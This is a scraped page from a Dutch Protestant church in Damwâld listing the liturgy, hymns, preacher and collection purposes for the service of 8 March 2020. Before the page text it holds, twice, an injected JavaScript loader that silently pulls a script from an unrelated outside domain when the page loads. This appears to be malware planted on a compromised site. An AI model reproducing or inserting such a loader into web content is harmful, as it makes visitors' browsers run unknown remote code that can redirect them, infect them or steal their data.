;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 8 maart 2020 9:30 uur - PKN Damwâld
zondag 8 maart 2020
09:30 uur

Kerkdienst zondag 8 maart 2020 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Henk Hoogeveen
Liturgie
Lied voor de dienst Nlb 868 : 1 en 2
Welkomstwoord
We zingen: Elb 343 1, 2 en 3
Stilgebed, Votum en Groet
We zingen: Nlb 16 : 1 en 3
Wetslezing .
We zingen: Nlb 86 : 4 en 5
Gebed
We lezen: Mt : 17:14-21
We zingen: Nlb 43 :3 en 5
Preek .
We zingen: Nlb 800 : 1 en 4
Dankgebed en voorbede
Collecte
slotlied : Elb 469 : 1 en 2
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Als kerk naar de mensen toe

40Dagentijdcollecte: Protestantse Kerk – Missionair Nederland – Als kerk naar de mensen toe
Voor mensen die (bijna) nooit in de kerk komen is het vaak lastig om zomaar een kerkdienst bij te wonen. En hoe kunnen we het evangelie uitdragen wanneer we geen contact hebben met deze mensen? Met pionieren zetten kerken een stap naar buiten. Niet de mensen naar de kerk laten komen, maar als kerk naar de mensen toe gaan. Pioniers zoeken naar nieuwe vormen van kerk zijn die passen bij de context en de mensen die ze ontmoeten buiten de kerk. Zij vormen een nieuwe christelijke geloofsgemeenschap waarbij de boodschap van het evangelie niet losgelaten, maar wel op een andere manier gedeeld wordt. De Protestantse Kerk ondersteunt startende pioniersplekken

Tweede collecte: Kerk
Uitganscollecte: Kerk